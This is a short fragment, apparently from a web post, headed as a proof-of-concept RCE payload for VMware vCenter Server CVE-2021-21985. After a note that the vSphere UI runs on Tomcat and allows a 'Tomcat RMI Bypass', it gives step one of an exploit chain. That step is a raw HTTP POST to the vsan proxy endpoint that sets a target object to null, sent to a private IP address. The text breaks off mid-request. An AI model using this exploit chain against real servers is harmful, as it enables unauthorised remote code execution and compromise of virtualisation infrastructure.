Vcenter Server CVE-2021-21985 – RCE PAYLOAD – POC
Note: Vsphere UI is Tomcat middleware by default, so arbitrary code can be executed in the manner of Tomcat RMI Bypass. Step 1 setTargetObject to null POST /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetObject HTTP/1.1Host: 192.168.18.17Connection:…